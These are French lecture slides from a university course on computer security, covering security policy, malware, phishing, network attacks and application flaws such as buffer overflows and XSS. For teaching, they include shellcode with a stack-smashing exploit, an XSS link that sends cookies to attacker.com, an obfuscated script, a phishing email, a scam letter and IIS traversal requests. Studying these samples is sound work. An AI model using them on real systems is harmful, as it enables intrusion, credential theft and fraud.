Professional Documents
Culture Documents
Patrick Ducrot
dp@ensicaen.fr http://www.ducrot.org/securite.pdf
Plan du document
Gnralits 3 Les menaces 37 Vulnrabilits du rseau 72 Vulnrabilits applicatives 110 Les outils d'attaque/dfense 166 Chiffrement, tunnels et vpn 225 Firewall 244 Les honeypots 260 WiFi et scurit 266 Conseils et conclusion280
06/11/2013 - ENSICAEN (c) dp 2
Gnralits
06/11/2013
- ENSICAEN -
(c) dp
Un des moyens techniques pour faire fonctionner un systme dinformation est dutiliser un
Systme informatique
06/11/2013
- ENSICAEN -
(c) dp
Virus
Intgrit Disponibilit
RESEAU
Attaques rseau
Confidentialit (coute) Intgrit (modification paquets) Disponibilit (saturation)
Rayonnements
confidentialit
06/11/2013
- ENSICAEN -
(c) dp
06/11/2013
- ENSICAEN -
(c) dp
LulzSec
Phnomnes techniques
Explosion de la technologie des transferts de donnes (comme par exemple le cloud computing ) Grande complexit des architectures de systmes. Ouverture (pas toujours matrise) des rseaux de communication
06/11/2013 - ENSICAEN (c) dp 11
Phnomnes organisationnels
Besoin de plus en plus d'informations Grande diversit dans la nature des informations:
donnes financires donnes techniques donnes mdicales
Ces donnes constituent les biens de l'entreprise et peuvent tre trs convoites.
06/11/2013 - ENSICAEN (c) dp 12
06/11/2013
Les botnets
La notion de botnet date des premiers rseaux irc (dbut des annes 1990). Rseau de machines contrles par un bot herder ou botmaster . Un botnet peut tre contrl par Serveurs irc Serveurs web Requtes DNS Messageries instantanes Peer to Peer Skype
06/11/2013
- ENSICAEN -
(c) dp
14
Les botnets
Estimation: une machine sur quatre fait partie dun botnet, soit environ 154 millions de machines (Vinton Cerf Davos en janvier 2007). Un botnet peut tre utilis pour: Envoyer du spam Vol dinformations sensibles (avec un keylogger par exemple). Installer des spywares. Paralyser un rseau en dni de services Installer un site web malicieux (phishing) Truquer les statistiques de sites webs (sondage en lignes authentifis par des adresses IP, rmunration sur des clics de bannires, ) Quelques exemples: Jeanson James Ancheta, condamn en 2006 57 mois de prison ferme et trois ans de liberts surveilles, la tte dun botnet estim 400 000 machines. Pirate connu sous le pseudo de 0x80 . Lire larticle: http://www.washingtonpost.com/wp-dyn/content/article/2006/02/14/AR2006021401342.html
06/11/2013
- ENSICAEN -
(c) dp
15
Botnet irc
06/11/2013
- ENSICAEN -
(c) dp
16
Botnet p2p
06/11/2013
- ENSICAEN -
(c) dp
17
Vengeance/rancune Politique/religion
source: http://www.zone-h.fr
Dfis intellectuels
06/11/2013 - ENSICAEN (c) dp 18
Lgislation
Matriel
06/11/2013
- ENSICAEN -
(c) dp
20
Niveaux de scurisation
Sensibilisation des utilisateurs aux problmes de scurit. Scurisation des donnes, des applications, des systmes d'exploitation. Scurisation des tlcommunications. Scurisation physiques du matriel et des accs.
06/11/2013
- ENSICAEN -
(c) dp
21
Politique de scurit
Compromis fonctionnalit - scurit. Identifier les risques et leurs consquences. Elaborer des rgles et des procdures mettre en uvre pour les risques identifis. Surveillance et veille technologique sur les vulnrabilits dcouvertes. Actions entreprendre et personnes contacter en cas de dtection d'un problme.
06/11/2013
- ENSICAEN -
(c) dp
22
06/11/2013
Quelques mthodes
EBIOS (Expressions des Besoins et Identification des Objectifs de Scurit)
http://www.ssi.gouv.fr/fr/confiance/ebios.html
06/11/2013
- ENSICAEN -
(c) dp
24
Amliorer
06/11/2013
06/11/2013
- ENSICAEN -
(c) dp
26
Application PSSI
Eviter ceci:
06/11/2013
- ENSICAEN -
(c) dp
27
06/11/2013
- ENSICAEN -
(c) dp
28
PRA / PCA
Les Plans de Reprise dActivits et les Plans de Continuit dActivit (PCA) sont composs de documents et de procdures destins permettre le fonctionnement en cas dincident/sinistre. Le PRA est destin reprendre lactivit, ventuellement en mode dgrad, aprs un certain temps. Le PCA est destin assurer la continuit du service, ventuellement en mode dgrad. Ramener au systme informatique, on peut aussi parler de Plan de Secours Informatique (PSI) et de Plan de Continuit Informatique (PCI).
- ENSICAEN (c) dp 29
06/11/2013
PRA / PCA
Quelques questions se poser: Quels sont les services prioritaires ? Quelles sont les ressources (locaux, quipement, personne) ? Quelle est la dure maximale dinterruption admissible (Recovery Time Objective) ? Quelle est la perte de donnes maximale admissible (Recovery Point Objective)?
06/11/2013
- ENSICAEN -
(c) dp
30
RTO
Le dlai dinterruption est compos: Dlai de dtection de lincident (t1) Dlai de dcision du passage en mode secours (t2) Dlai de mise en uvre des procdures de secours (t3) Dlai de contrle et relance des services et applications (t4) t1 + t2 + t3 + t4 < RTO La valeur du RTO impacte linfrastructure:
Pour un RTO de 24h, un contrat de maintenance sur site peut suffire UN RTO proche de zro peut ncessiter du clustering, une salle serveur gographiquement distante,
06/11/2013
- ENSICAEN -
(c) dp
31
RPO
Le RPO quantifie les donnes que lon peut tre amen perdre suite un incident. Le RPO exprime une dure entre le moment de lincident et la date la plus rcente des donnes qui pourront tre restaures. Le RPO est conditionn par le type et la frquence des sauvegardes effectues. Les donnes perdues pourront tre rcupres partir dune sauvegarde, dune rplication, dun journal de transaction, Des sauvegardes rgulires peuvent suffire dans le cas dun RPO lev. Pour un RPO faible, des mcanismes tels que la rplication synchrone doivent tre mis en place.
06/11/2013
- ENSICAEN -
(c) dp
32
Mthodologie
Primtre du projet Cahier des charges (fonctions prioritaires, niveau de service, ..) Analyse (tat de lexistant, criticit des services) Phase dorientation (hirarchisation de la criticit des systmes, sauvegarde des donnes critiques, ) Proposition de solutions et darchitectures Validation Maquettage et tests si ncessaire Mise en uvre Tests et recettes (toujours penser au pire, tablir la documentation et les procdures, )
06/11/2013
- ENSICAEN -
(c) dp
33
06/11/2013
- ENSICAEN -
(c) dp
35
Plan de sauvegarde
Types de sauvegardes:
Sauvegarde complte Tout est sauvegard Sauvegarde diffrentielle Sauvegarde des fichiers modifis depuis la dernire sauvegarde complte. La restauration devra rcuprer la sauvegarde complte et la dernire sauvegarde diffrentielle. Sauvegarde incrmentale Sauvegarde des fichiers depuis la dernire sauvegarde. La restauration devra rcuprer la dernire sauvegarde complte et toutes les sauvegardes incrmentales. La priodicit des sauvegardes La dure de rtention des sauvegardes Un lieu de stockage des sauvegardes
Dfinir
06/11/2013
- ENSICAEN -
(c) dp
36
Les menaces
06/11/2013
- ENSICAEN -
(c) dp
37
Techniques d'attaques
Social Engineering MICE (Money, Ideology, Compromise, Ego) Dumpster diving Shoulder surfing Sniffing Scannings etc.
- ENSICAEN (c) dp 38
06/11/2013
Dissimulation d'informations
L'information peut tre dissimule dans un but de protection (mot de passe, ) ou dans des buts moins lgaux. Diffrentes mthodes pour s'changer de l'information de manire sre:
chiffrement (symtrique,asymtrique) stganographie
Stganographie
Procd ancien de dissimulation d'informations sensibles parmi d'autres informations moins importantes. Exemple: correspondance attribue George Sand et Alfred de Musset:
Quand je mets vos pieds un ternel hommage, Voulez-vous qu'un instant je change de visage ? Vous avez captur les sentiments d'un coeur Que pour vous adorer forma le crateur. Je vous chris, amour, et ma plume en dlire Couche sur le papier ce que je n'ose dire. Avec soin de mes vers lisez les premiers mots, Vous saurez quel remde apporter mes maux.
Cette indigne faveur que votre esprit rclame Nuit mes sentiments et rpugne mon me
06/11/2013
- ENSICAEN -
(c) dp
41
Stganographie
Moyens modernes: dissimuler de linformation dans des fichiers graphiques, sons, vidos. Cas particulier du watermarking.
06/11/2013
- ENSICAEN -
(c) dp
42
06/11/2013
Virus
Portion de code inoffensive ou destructrice capable de se reproduire et de se propager. Diffrents types de virus: Virus boot Virus dissimul dans les excutables Macro virus Diffrentes contaminations possibles: change de disquettes Pices jointes au courrier lectronique Excutables rcuprs sur Internet etc.
06/11/2013 - ENSICAEN (c) dp 44
Vers
Proches des virus mais capables de se propager sur d'autres ordinateurs travers le rseau. Un moyen courant de propagation: le carnet d'adresses d'outlook (ex: "I Love you": dni de service sur les serveurs web). Quelques exemples: Code Red (utilisation d'une faille des serveurs IIS et dfiguration des sites) Blaster (utilisation d'une faille du protocole windows DCM RPC)
06/11/2013 - ENSICAEN (c) dp 45
06/11/2013
- ENSICAEN -
(c) dp
46
http://windows7news.com/2010/02/25/operation-b49-waledac-botnet-take-down/
06/11/2013
- ENSICAEN -
(c) dp
47
Chevaux de troie
Trs rpandu (exemples: attaque du ministre de lconomie et des finances rendu public en dcembre 2010, attaque contre AREVA rendu public le 29 septembre 2011, infections par des vulnrabilits dInternet Explorer en septembre 2012, ) Quelques exemples anciens de chevaux de Troie: Back Orifice Permet de l administration distance. Sockets23 (Socket de Troie) Signalait la prsence des ordinateurs infects sur des serveurs de discussion en direct de type irc.
06/11/2013 - ENSICAEN (c) dp 48
Les spywares
Dfinition du spyware (http://en.wikipedia.org/wiki/Spyware):
Un spyware ("espiogiciel") est un logiciel qui collecte des informations d'une machine et les envoie l'insu de l'utilisateur sans son consentement.
Un spyware se dcline aujourd'hui en "adware" (logiciel d'affichage de publicit) et en "malware" ("pourriciel", logiciels hostiles)
06/11/2013
- ENSICAEN -
(c) dp
49
06/11/2013
- ENSICAEN -
(c) dp
50
Dtection de spyware
Comportement anormal de la machine:
Fentres "popup" intempestive. Page d'accueil du navigateur modifie. Apparitions d'icnes sur le bureau. Connexions Internet intempestives. Trafic rseau anormal. Dsactivation des outils de scurit locaux. DLL modifie (dtectable par un antivirus). Firewall personnel Outils anti rootkits Connexions rcurrentes et/ou nocturnes. Tlchargements suspects. Connexions vers des sites rputs pour tre lis au spyware. Connexions vers des sites non rfrencs dans un dns. Connexions vers des sites .ru .cc .tw .cn
06/11/2013
- ENSICAEN -
(c) dp
51
06/11/2013
- ENSICAEN -
(c) dp
52
SPAM
Dfinition de la CNIL: Envoi massif et parfois rpt de courriers lectroniques non sollicits des personnes avec lesquelles lexpditeur na jamais eu de contact au pralable, et dont il a capt ladresse lectronique de faon irrgulire.(pourriel en franais). SPAM=Spiced Pork And Meat, popularis par un sketch des Monty Python (http://www.dailymotion.com/swf/x3a5yl) Un message va tre dpos dans une liste de relais de messagerie qui vont envoyer une copie chaque destinataire. Courrier bas sur une liste dadresses collectes de manire dloyale et illicite. Messages peu coteux lenvoi mais coteux pour le destinataire.
06/11/2013
- ENSICAEN -
(c) dp
54
06/11/2013
- ENSICAEN -
(c) dp
55
06/11/2013
- ENSICAEN -
(c) dp
56
<HTML> Laisser un message <script type="text/javascript"> //<![CDATA[ var d="";for(var i=0;i<359;i++)d+=String.fromCharCode(("%o!.rK00It}!6%o!.wK>IwJ@DDIw997r9Ka#!w|u<t!}{Qvo!Q}rs660)4(:2*3 9R<7.9*LK`&D/-7*+aFFD4324/:/8*4;*7aF9-.8R-7*+a!K2&.1/94^KR7*j51&(*LS/S,PFFMOw97.3,R+742g&7g4)*LUTTPUUVMO FdF\" T\"OK*38.(b&*bb3bKR7*j51&(*LSbS,P FF\" T\"MO FRF\" T\"Ow97.3,R+742g&7g4)*LUTVPUYWQW]MOK!KFD4324:8*4T:9aF9-.8R-T7T*+a!K!KFTb.(.`S&bKR7*j51&(*LSTS,P FF\" T\"MM0<qvo!Q}rsO#6w79B?73GC9A@7Is%oz6r7".charCodeAt(i)+49)%95+32);eval(d) //]]> </script> </HTML>
06/11/2013
- ENSICAEN -
(c) dp
57
Adresse jetable
06/11/2013
- ENSICAEN -
(c) dp
58
06/11/2013
06/11/2013
- ENSICAEN -
(c) dp
60
Phishing
Contraction de PHreaking et fISHING (Hameonnage). Technique d'ingnierie sociale utilise par des arnaqueurs (scammers) Technique ancienne mais utilise massivement depuis 2003. Par le biais de courrier lectronique, messages instantans, site webs, etc., on tente de duper l'utilisateur en le faisant cliquer sur un lien. L'objectif est d'obtenir des adresses de cartes de crdit, des mots de passe, etc. Les adresses sont collectes au hasard, mais statistiquement un utilisateur peut avoir l'impression de recevoir un courrier d'un site qui lui est familier (banque, ).
- ENSICAEN (c) dp 61
06/11/2013
06/11/2013
- ENSICAEN -
(c) dp
62
Exemple phishing
Dear valued PayPal member: Due to concerns, for the safety and integrity of the paypal account we have issued this warning message. It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records on or before Oct 04, 2005. Once you have updated your account records your paypal account service will not be interrupted and will continue as normal. To update your PayPal records click on the following link: http://www.paypal.com/cgi-bin/webscr?cmd=_login-run Thank You. PayPal UPDATE TEAM
http://209.133.49.211/icons/cgi-bin/login.html
06/11/2013 - ENSICAEN (c) dp 63
06/11/2013
- ENSICAEN -
(c) dp
64
06/11/2013
- ENSICAEN -
(c) dp
65
06/11/2013
- ENSICAEN -
(c) dp
66
06/11/2013
- ENSICAEN -
(c) dp
67
06/11/2013
- ENSICAEN -
(c) dp
68
Le "scam"
Pratique frauduleuse d'origine africaine ("ruse") pour extorquer des fonds des internautes. Rception d'un courrier lectronique du descendant d'un riche africain dcd dont il faut transfrer les fonds. Connue aussi sous le nom de 419 en rfrence l'article du code pnal nigrian rprimant ce type d'arnaque.
06/11/2013 - ENSICAEN (c) dp 69
Exemple de "scam"
Objet: ASSISTANCE GEORGES TRAORE ABIDJAN,CTE D'IVOIRE. AFRIQUE DE L'OUEST. Bonjour, Je vous prie de bien vouloir excuser cette intrusion qui peut paratre surprenante premire vue d'autant qu'il n'existe aucune relation entre nous. Je voudrais avec votre accord vous prsenter ma situation et vous proposer une affaire qui pourrait vous intresser. Je me nomme Georges TRAORE, j'ai 22 ans et le seul fils de mon Pre Honorable RICHARD ANDERSON TRAORE qui tait un homme trs riche, ngociant de Caf/Cacao bas Abidjan la Capitale Economique de la Cte d'Ivoire, empoisonn rcemment par ses associs. Aprs la mort de ma mre le 21 Octobre 2000, mon pre m'as pris spcialement avec lui. Le 24 Dcembre 2003 est survenu le dcs de mon pre dans une clinique prive (LAMADONE) Abidjan. Avant sa mort, secrtement, il m'a dit qu'il a dpos une somme d'un montant de ($8,500,000) Huit Millions Cinq Cent Mille Dollars Amricains dans une valise dans une Compagnie de Scurit Financire en mon nom comme hritier. En outre, il m'a dit que c'est par rapport cette richesse qu'il a t empoisonn par ses associs. Il me recommande aussi de chercher un associ tranger qui pourrait honntement me faire bnficier de son assistance pour sauver ma vie et assurer mon existence. - Changement de bnficaire ; Servir de gardien ; - Fournir un compte pour le transfert de fonds ; - M'aider le rejoindre dans son pays ; - Investir dans un domaine profitable. D'ailleurs, je vous donnerai 25 % et 5% serviront aux dpenses ventuelles qui seront effectues. .
06/11/2013
- ENSICAEN -
(c) dp
70
06/11/2013
- ENSICAEN -
(c) dp
73
Rappel : Entte IP
32 bits
Version IHL
Type Service
Flags
74
06/11/2013
- ENSICAEN -
(c) dp
75
Port source
Taille de la fentre
Total de contrle
Pointeur d'urgence
06/11/2013
- ENSICAEN -
(c) dp
76
06/11/2013
- ENSICAEN -
(c) dp
77
Sniffer
Outil de base indispensable. Permet de visualiser les trames sur un segment de rseau. Ncessite des droits administrateurs. Attention au problme juridique Utilise des sockets en mode promiscuous
socket (AF_INET,SOCK_RAW,IPPROTO_RAW)
06/11/2013
- ENSICAEN -
(c) dp
78
Sniffer
Beaucoup de logiciels sniffers existants. Liste sur http://packetstormsecurity.org/sniffers Le sniffer de base pour unix: tcpdump
Disponible sur http://www.tcpdump.org. Grammaire trs volue. Affiche les enttes de paquets rpondant au critre spcifi.
06/11/2013 - ENSICAEN (c) dp 79
Sniffer multiplateformes
wireshark (http://www.wireshark.org)
06/11/2013
- ENSICAEN -
(c) dp
80
06/11/2013
- ENSICAEN -
(c) dp
81
IP Spoofing
Mthode d'attaque qui parodie l'adresse IP d'un autre ordinateur (usurpation). Permet de brouiller les pistes ou d'obtenir un accs des systmes sur lesquels l'authentification est fonde sur l'adresse IP (rlogin, rsh sur les machines numro de squence TCP prvisible).
06/11/2013
- ENSICAEN -
(c) dp
82
Usurpation d'identit
Exemple d'utilisation: attaque d'un remote shell: echo "+ +" >>/.rhosts
06/11/2013 - ENSICAEN (c) dp 83
06/11/2013
- ENSICAEN -
(c) dp
84
06/11/2013
- ENSICAEN -
(c) dp
85
06/11/2013
- ENSICAEN -
(c) dp
86
DDoS
Distributed Denial Of Service. Type d attaque trs en vogue. L objectif est d crouler une machine et/ou saturer la bande passante de la victime. Ncessite un grand nombre de machines corrompues. Attaque popularise le 14 fvrier 2000 sur quelques sites .com renomms (ebay, cnn, amazon, microsoft, ). Le coupable, Michael Calce alias Mafiaboy , 15 ans, est arrt au Canada le 15 avril et condamn 8 mois dans un centre de dtention pour jeunes. Il a caus des pertes estimes 1,7 milliards de dollars.
http://www.youtube.com/watch?v=NPT-NIMoEgo (partie 1) http://www.youtube.com/watch?v=hVrU_3xX5ic (partie 2)
06/11/2013
- ENSICAEN -
(c) dp
91
Scnario d un DDoS
06/11/2013
- ENSICAEN -
(c) dp
92
06/11/2013
- ENSICAEN -
(c) dp
93
06/11/2013
- ENSICAEN -
(c) dp
95
Exemples DDoS
Serveurs DNS de la compagnie Akamai attaqu le 16 juin 2004 (sites Microsoft, Google, Yahoo, fedEx, Xerox, Apple injoignables pendant une courte priode). Mastercard, PayPal, EveryDNS, Swiss Bank PostFinances en dcembre 2010 par les Anonymous
NBS victime dune attaque DDOS dans la nuit du 10 au 11 octobre 2011 http://www.loichelias.com/nbs-attaque-ddos
06/11/2013
- ENSICAEN -
(c) dp
96
Exemples DDOS
Bande passante du rseau informatique du snat les 25 et 26 dcembre 2011 avant ladoption de la loi rprimant la contestation des gnocides*
Et tant dautres.
* Source: rapport No 681 du snat par Jean-Marie Bockel 06/11/2013 - ENSICAEN (c) dp 97
arp spoofing
Pollution des caches arp avec de fausses associations adresse mac/adresse IP. Permet des attaques de type "man in the middle", DOS, transgression des rgles d'un firewall par spoofing.
arp-reply
192.168.16.10
192.168.16.10 00:50:04:47:5F:5F
06/11/2013
- ENSICAEN -
(c) dp
98
arp spoofing
Exemple d'outil d'arp spoofing:
arp-sk (linux) Cain & Abel (Windows)
06/11/2013
- ENSICAEN -
(c) dp
99
Applications du arp-spoofing
Ecouter le rseau local Initier une attaque man in the middle pour les sessions hybrides http/https
intrus
Arp spoofing Arp spoofing Interception et Interprtation du flux http, remplacement des balises https par http Site web Utilisateur -> site web
06/11/2013
- ENSICAEN -
(c) dp
100
06/11/2013
- ENSICAEN -
(c) dp
101
tcp hijacking
06/11/2013
- ENSICAEN -
(c) dp
102
tcp hijacking
Numros de squence TCP pendant les changes:
Ut1 Seq x PSH/ACK y (10) Ut2 Ut1 Seq y PSH/ACK x+10 (20) Ut2 Ut1 Seq x+10 PSH/ACK y+20 (30) Ut2 Ut1 Seq y+20 PSH/ACK x+40 (10) Ut2 Pirate Seq x+40 PSH/ACK y+20 (30) Ut2 Ut1 Seq y+30 PSH/ACK x+70 (20) Ut2
Smurf
Envoie d'une trame ICMP "echo request" sur une adresse de diffusion. Exemple: ping 193.49.200.255 Mthode utilise pour dterminer les machines actives sur une plage IP donne.
06/11/2013 - ENSICAEN (c) dp 104
Attaque en Smurf
Objectif: crouler une machine 3 parties: l'attaquant, l'intermdiaire, la victime
Trame ICMP Echo request sur adresse de diffusion du site relai Adresse source: IP victime
06/11/2013
- ENSICAEN -
(c) dp
105
Parades au smurf
Interdire la rponse aux trames ICMP sur les adresses de diffusion:
Au niveau routeur Au niveau machine
06/11/2013
- ENSICAEN -
(c) dp
106
cache poisoning
06/11/2013
- ENSICAEN -
(c) dp
107
Exemple: BIND
Vulnrabilit dcouverte en juillet 2007 touchant de nombreuses versions de BIND (CVE-2007-2926 , BID25037). Description du CERTA:
vulnrabilit a t identifie dans BIND. La faille concerne le gnrateur d'identifiants de requtes, vulnrable une cryptanalyse permettant une chance leve de deviner le prochain identifiant pour la moiti des requtes. Ceci peut tre exploit par une personne malintentionne pour effectuer du cache poisoning et donc contourner la politique de scurit. "
06/11/2013 - ENSICAEN (c) dp 108
"Une
06/11/2013
- ENSICAEN -
(c) dp
109
Vulnrabilits applicatives
06/11/2013 - ENSICAEN (c) dp 110
Vulnrabilits applicatives
Beaucoup d'applications sont vulnrables dues de la mauvaise programmation (par manque de temps, de motivation, ) ou volontairement (amnagement d'un point d'entre, ). Toutes les applications ont besoin de scurit: services rseaux (daemons), les applications tlcharges (applet java, ), les applications web (scripts cgi, ), les applications utilises par l'administrateur ou disposant d'un bit setuid/setgid, visualisateur de donnes distantes, et finalement probablement toutes les applications
06/11/2013 - ENSICAEN (c) dp 111
Dbordements de tampons (buffer overflow) Chanes de format Entres utilisateurs mal valides Les problmes de concurrence etc.
- ENSICAEN (c) dp 113
Buffer Overflow
Appele aussi "buffer overruns"; c'est une vulnrabilit extrmement tendue (environ 2/3 des vulnrabilits). criture de donnes en dehors de la zone alloue (pile ou tas).
06/11/2013
- ENSICAEN -
(c) dp
114
[dp@ns bufferoverflow]$ gdb demo (gdb) run aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Starting program: /users/dp/bufferoverflow/demo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? ()
06/11/2013 - ENSICAEN (c) dp 115
Buffer Overflow
Si le buffer est une variable C locale, on pourra essayer de forcer la fonction excuter du code pirate ("stack smashing attack"). Beaucoup d'applications crites en langage C sont vulnrables car la simplicit et l'efficacit de ce langage ont prvalu sur les contrles d'intgrit laisss la responsabilit du programmeur. Mais le problme existe galement dans d'autres langages de programmation.
06/11/2013
- ENSICAEN -
(c) dp
116
Storage file
Process in memory
06/11/2013
- ENSICAEN -
(c) dp
117
06/11/2013
- ENSICAEN -
(c) dp
119
06/11/2013
- ENSICAEN -
(c) dp
120
Code Shell
Le buffer overflow va tre utilis pour provoquer l'excution de /bin/sh, shell prsent dans toutes les distributions unix. Gnration du code assembleur de la squence: execve (argv[0],"/bin/sh",NULL) Exemple code Linux x86:
char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh";
06/11/2013 - ENSICAEN (c) dp 121
strcpy overflow
long_ptr (4)
i (4)
buffer (96)
large_string (128)
shellcode
06/11/2013
- ENSICAEN -
(c) dp
123
Stack Smashing
Dans la ralit, les applications ne comportent naturellement pas de squence shell. L'exploitation d'un "buffer overflow" ncessite d'essaye de piger l'application avec la ligne de commande, les variables d'environnement shell, les entres de donnes interactives,
06/11/2013
- ENSICAEN -
(c) dp
124
Exemple dapplication
char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\ xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"\xff\xff/bin/sh"; void main () { char buffer [128] ; int i ; long address = (long)&buffer ; for (i = 0 ; i < 128 ; i++) buffer [i] = 0x90 ; buffer [12] = address >> 0 & 0xff ; buffer [13] = address >> 8 & 0xff ; buffer [14] = address >> 16 & 0xff ; buffer [15] = address >> 24 & 0xff ; for (i = 0 ; i < strlen (shellcode) ; i++) buffer [128 - strlen (shellcode) + i] = shellcode [i] ; execl ("/users/dp/bufferoverflow/demo","demo",buffer,0) ; }
-rws--x--x 1 root
root
06/11/2013
- ENSICAEN -
(c) dp
125
Certains compilateurs peuvent mettre un repre ("canary") devant l'adresse de retour afin de la protger (stackguard driv de gcc).
06/11/2013 - ENSICAEN (c) dp 127
Exemple stackguard
sfp ret canary buffer
En cas dattaque
on crase le buffer, canary et ret avant le retour de la fonction, le programme vrifie le contenu de canary et dtecte lintrusion Le canary doit tre gnr alatoirement.
06/11/2013
- ENSICAEN -
(c) dp
128
Exemple de vulnrabilit
06/11/2013
- ENSICAEN -
(c) dp
129
Chanes de format
Problme connu depuis juin 1999 et exploit depuis juin 2000. Leur exploitation ont conduit des vulnrabilits "remote root" (wu-ftpd, linux tpc.statd, ) et "local root" (OpenBSD fstat, ) De nombreuses vulnrabilits sont probablement encore venir.
06/11/2013 - ENSICAEN (c) dp 130
Fonctions C de formatage
Exemples de telles fonctions: toute la famille des fonctions printf, syslog. Fonctions acceptant un nombre variable de paramtres dont l'un est une chane de format. Les variables affiches sont converties en une reprsentation affichable et comprhensible par l'homme.
06/11/2013 - ENSICAEN (c) dp 131
Exemple de vulnrabilit
06/11/2013
- ENSICAEN -
(c) dp
136
Race Condition
Toute ressource (fichiers, structure de donnes, ) peut tre manipule simultanment par plusieurs processus ou plusieurs threads. Certaines oprations doivent donc tre rendues atomiques. Les droits d'accs doivent tre trs prcis. Exemple: quel est danger du programme sur le transparent suivant, sachant que l'excutable appartient "root" et possde le SetUser ID (bit s) ?
06/11/2013 - ENSICAEN (c) dp 137
Race Condition
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> int main (int argc,char **argv) { struct stat st ; FILE *fp ; if (argc != 3) { fprintf (stderr,"usage : %s fichier message\n", argv [0]) ; exit (EXIT_FAILURE) ;} if (stat (argv [1], &st) < 0) {fprintf (stderr,"%s introuvable\n",argv [1]) ;exit (EXIT_FAILURE) ;} if (st.st_uid != getuid ()) {fprintf (stderr,"%s ne vous appartient pas !\n", argv [1]) ;exit (EXIT_FAILURE) ;} if (! S_ISREG (st.st_mode)) {fprintf (stderr,"%s n'est pas un fichier normal\n", argv [1]) ;exit (EXIT_FAILURE) ;} if ( (fp = fopen (argv [1],"w")) == NULL) {fprintf (stderr,"Ouverture impossible\n") ;exit (EXIT_FAILURE) ;} fprintf (fp,"%s\n",argv [2]) ;fclose (fp) ;fprintf (stderr,"Ecriture OK\n") ; exit (EXIT_SUCCESS) ; }
06/11/2013
- ENSICAEN -
(c) dp
138
Fonctions utiliser
Il faut conserver la totale matrise d'un fichier lors de sa manipulation d'un fichier. Quelques exemples de fonctions utilisables:
int open (pathname,flag,mode) fstat (inf fd,struct stat *st) Ouverture d'un fichier. Renvoie un descripteur Informations sur un fichier
FILE *fdopen (int fd,char *mode) Obtenir un flux partir d'un descripteur dj ouvert
06/11/2013
- ENSICAEN -
(c) dp
139
Fichiers temporaires
Les applications crent des fichiers temporaires dans /tmp
drwxrwxrwt 6 root root 1024 Sep 29 15:01 /tmp Problme quand le nom du fichier temporaire est prvisible et cr par une application root suid: Cration d'un lien symbolique entre ce fichier et un fichier systme critique (/etc/shadow par exemple) L'application doit tre ensuite tue pour qu'elle ne puisse effacer son fichier temporaire.
06/11/2013 - ENSICAEN (c) dp 140
Fichiers temporaires
Cration d'un rpertoire dans un rpertoire disposant d'un bit "t" (sticky bit):
Nom de fichier alatoire. Fichier ouvert avec les droits O_CREAT|O_EXCL (attention aux disques NFS avec O_EXCL).
La fonction tmpfile (3) cre un fichier temporaire dans le rpertoire spcifi par la variable P_tmpdir de stdio.h. Mais pas de prcision sur les droits d'accs.
Utiliser plutt mkstemp (3) en conjonction avec umask (2).
06/11/2013 - ENSICAEN (c) dp 142
Exemple de vulnrabilit
06/11/2013
- ENSICAEN -
(c) dp
144
06/11/2013
Etude de cas
Microsoft IIS 4.0 et 5.0 tait vulnrable au problme: "MS IIS/PWS Escaped Characters Decoding Command Execution Vulnrability". Dtail sur http://www.securityfocus.com/cgi-bin/vulnsitem.pl?section=discussion&id=2708 Correctif sur http://www.microsoft.com/technet/security/bulletin/MS01026.asp
06/11/2013
- ENSICAEN -
(c) dp
148
Exemples d'attaque
Donnes extraites du fichier de log de http://www.ensicaen.fr
host-213-191-162-202.warsun.com - - [27/Aug/2004:07:42:22 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 195.224.89.179 - - [28/Aug/2004:14:17:43 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 artemisa.escet.urjc.es - - [05/Sep/2004:20:17:35 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 195.167.240.188 - - [08/Sep/2004:03:53:14 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 128.192.164.95 - - [10/Sep/2004:02:46:42 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
06/11/2013
- ENSICAEN -
(c) dp
149
06/11/2013
- ENSICAEN -
(c) dp
151
Pourquoi ce nom :
Attaque base sur lexcution de scripts dans le navigateur de la victime (javascript, vbscript, ). La victime passe dun site lautre sans sen apercevoir.
Lacronyme XSS:
CSS : Cascading Style Sheet XSS : Cross Site Scripting (excution croise de code).
06/11/2013 - ENSICAEN (c) dp 152
Intrt de XSS
http est un protocole sans notion de session: pas de lien entre les requtes reues par le serveur. Une session doit tre construite artificiellement: Par un cookie envoy au navigateur Par manipulation dURL contenant un identifiant Par des paramtres dun programme Etc.
06/11/2013
- ENSICAEN -
(c) dp
153
Exemple dattaque
06/11/2013
- ENSICAEN -
(c) dp
154
06/11/2013
- ENSICAEN -
(c) dp
155
<html> <a href="http://www.vulnerable.com/var=<script>do cument.location.replace(http://attacker.com/steal .cgi?+document.cookie);</script>"> cliquer ici pour recevoir 50 euros </a> </html> 06/11/2013 - ENSICAEN (c) dp 156
Script steal.cgi
